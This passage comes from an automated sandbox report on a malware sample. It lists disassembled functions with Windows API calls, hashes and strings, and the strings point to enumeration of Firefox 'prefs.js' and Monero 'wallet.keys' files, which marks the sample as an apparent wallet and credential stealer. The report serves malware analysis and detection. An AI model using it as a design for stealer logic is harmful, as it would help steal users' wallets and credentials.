                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 2665b4b5cbb094481c627daf26f85c7e2f0950885ba0eb5131c8f56f3e092bb0
                          • Instruction ID: 868c3fbac098dfed3100d3ba315a5c04ea036c06ebcef1c2c742356e94e4f71e
                          • Opcode Fuzzy Hash: 2665b4b5cbb094481c627daf26f85c7e2f0950885ba0eb5131c8f56f3e092bb0
                          • Instruction Fuzzy Hash: EB5133B15103189BCB24EBB4DD89FFE777CEB68300F404598B609D6190EB749B858FA1
                          Function 00AF3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00AF3EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00AF3EDA
                          • StrCmpCA.SHLWAPI(?,00B00FAC), ref: 00AF3F08
                          • StrCmpCA.SHLWAPI(?,00B00FB0), ref: 00AF3F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AF406C
                          • FindClose.KERNEL32(000000FF), ref: 00AF4081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: f9c61bf9c73b9745237f18e96457165959529ad1f373b3fcf8fee59db15535a8
                          • Instruction ID: b8ddc2988e3256d05fd2c847738dd0924e165f61f3154986c05575f67da0b60d
                          • Opcode Fuzzy Hash: f9c61bf9c73b9745237f18e96457165959529ad1f373b3fcf8fee59db15535a8
                          • Instruction Fuzzy Hash: 0F5143B6900218ABCB24FBB4DD85EFA737CFB58300F004588B75996140DB75EB868FA1
                          Function 00AEED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00AEED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 00AEED55
                          • StrCmpCA.SHLWAPI(?,00B01538), ref: 00AEEDAB
                          • StrCmpCA.SHLWAPI(?,00B0153C), ref: 00AEEDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AEF2AE
                          • FindClose.KERNEL32(000000FF), ref: 00AEF2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: 67c5846eaae785a8f1046b98734469095261941b6d55e74a01eb6952653e3c65
                          • Instruction ID: 749aac0d66bf4063c71fe8cb2ed62be27e9afe259ba18a4760eb2a4d736956e2
                          • Opcode Fuzzy Hash: 67c5846eaae785a8f1046b98734469095261941b6d55e74a01eb6952653e3c65
                          • Instruction Fuzzy Hash: ABE1E4B191111C9ADB54FBA4CD91EFE7378AF64340F4045E9B60E62092EE706F8ACF91
                          Function 00AEF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B015B8,00B00D96), ref: 00AEF71E
                          • StrCmpCA.SHLWAPI(?,00B015BC), ref: 00AEF76F
                          • StrCmpCA.SHLWAPI(?,00B015C0), ref: 00AEF785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AEFAB1
                          • FindClose.KERNEL32(000000FF), ref: 00AEFAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: 02a2e20cf40ff07aa1e9980c094a9e8246da023ddd67b69aa4d3ef8cb47a6780
                          • Instruction ID: ee4d4efe008f9746bf08a5ad09d7e5f4224ed4c04f11cc2defcd3dfd539dd73f
                          • Opcode Fuzzy Hash: 02a2e20cf40ff07aa1e9980c094a9e8246da023ddd67b69aa4d3ef8cb47a6780
                          • Instruction Fuzzy Hash: 38B141B19002189BCB24FFA4DD95EFE7379AF64340F4085A8B50E97191EF706B49CB92
                          Function 00AE16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B0510C,?,?,?,00B051B4,?,?,00000000,?,00000000), ref: 00AE1923
                          • StrCmpCA.SHLWAPI(?,00B0525C), ref: 00AE1973
                          • StrCmpCA.SHLWAPI(?,00B05304), ref: 00AE1989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AE1D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00AE1DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AE1E20
                          • FindClose.KERNEL32(000000FF), ref: 00AE1E32
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: 1e2ea6560f8bde040b3ed7448bde760713a2e48aa98d5c43e03da8440735878d
                          • Instruction ID: d2b2de6ab0a42147935106fb5cd1fbc5acfc9ecf6501eaae28529ad3ff91cad9
                          • Opcode Fuzzy Hash: 1e2ea6560f8bde040b3ed7448bde760713a2e48aa98d5c43e03da8440735878d
                          • Instruction Fuzzy Hash: 7112CFB191011C9BDB15FBA0DD96EFE7378AF64340F4045A9B60A62091EF706F89CFA1
                          Function 00AEDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00B00C2E), ref: 00AEDE5E
                          • StrCmpCA.SHLWAPI(?,00B014C8), ref: 00AEDEAE
                          • StrCmpCA.SHLWAPI(?,00B014CC), ref: 00AEDEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AEE3E0
                          • FindClose.KERNEL32(000000FF), ref: 00AEE3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: 30ee5dfb8008c6b5af310db9016dba408296a58f97cfd96f8fd321070a5a803f
                          • Instruction ID: 579d96577dc36baf7aeab8c0649ee1a20cd8dbbfe38f2fc49c58cb2a1d770251
                          • Opcode Fuzzy Hash: 30ee5dfb8008c6b5af310db9016dba408296a58f97cfd96f8fd321070a5a803f
                          • Instruction Fuzzy Hash: B5F19FB191411D9ADB25FBA0CD95EFE7378AF24340F4045E9B50E62091EF706B4ACFA1
                          Function 00EABAAF Relevance: 14.1, Strings: 10, Instructions: 1612COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: -zou$=J}$Ay?}$Rn$V~$^mx[$dz[_$f{$6$v/u$x]
                          • API String ID: 0-3884187865
                          • Opcode ID: 4cd21799ae7f21d4ec6d17c61336a5384133b470b00685d3bfdfc0f6b0291b58
                          • Instruction ID: df01bcef4dd8345941a99c54816e9608248bac2d919eab5c5b7a193602905b98
                          • Opcode Fuzzy Hash: 4cd21799ae7f21d4ec6d17c61336a5384133b470b00685d3bfdfc0f6b0291b58
                          • Instruction Fuzzy Hash: DCB217F3A082049FE3046E2DEC8567AFBE9EBD4720F1A463DEAC4C3744E97558058697
                          Function 00AEDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B014B0,00B00C2A), ref: 00AEDAEB
                          • StrCmpCA.SHLWAPI(?,00B014B4), ref: 00AEDB33
                          • StrCmpCA.SHLWAPI(?,00B014B8), ref: 00AEDB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AEDDCC
                          • FindClose.KERNEL32(000000FF), ref: 00AEDDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 7a77aaa0fe0c0b11b9d608272d7ce4150fd335e6d7de035fc3f0cc75020e055d
                          • Instruction ID: 3dda9744f5615e8518ce99a7d8d06576f3626926de5535330373700bbcfa890a
                          • Opcode Fuzzy Hash: 7a77aaa0fe0c0b11b9d608272d7ce4150fd335e6d7de035fc3f0cc75020e055d
                          • Instruction Fuzzy Hash: 549157B290020897CB14FBB4DD96DFD737DAB94340F408568F90AD6195EE74AB09CBA2
                          Function 00EB0914 Relevance: 11.6, Strings: 8, Instructions: 1629COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #N$M$)!7~$,x?}$6z3e$;<P$Ajy$[y_s$bNWi
                          • API String ID: 0-3561138217
                          • Opcode ID: 97b2ffa6e63cc06b275a7b1afcaeffffebccf75a03d59258bfc4c53d850c7738
                          • Instruction ID: 502f232c9a3ce4d31660bba7147d74aef4197fa83dc9ca4d0d7a2bc51a06c6f4
                          • Opcode Fuzzy Hash: 97b2ffa6e63cc06b275a7b1afcaeffffebccf75a03d59258bfc4c53d850c7738
                          • Instruction Fuzzy Hash: FCB217F390C204AFE314AE2DEC8577ABBE5EF94320F1A493DE6C4D7744E63598018696
                          Function 00AF7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,00B005AF), ref: 00AF7BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00AF7BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00AF7C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00AF7C62
                          • LocalFree.KERNEL32(00000000), ref: 00AF7D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 078d3240fc8422bbd3ca3a8d70a7b6a0aafc6d6cc5b4d1634793c50f66afa9be
                          • Instruction ID: 84a637c15bdcd5fff40d0299089710f95f569d393a867cf6d469703522a0f3c6
                          • Opcode Fuzzy Hash: 078d3240fc8422bbd3ca3a8d70a7b6a0aafc6d6cc5b4d1634793c50f66afa9be
                          • Instruction Fuzzy Hash: C3413CB194021CABDB24DB94DD99BFEB374FB54700F204199F209A2290DB742F86CFA1
                          Function 00AEE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
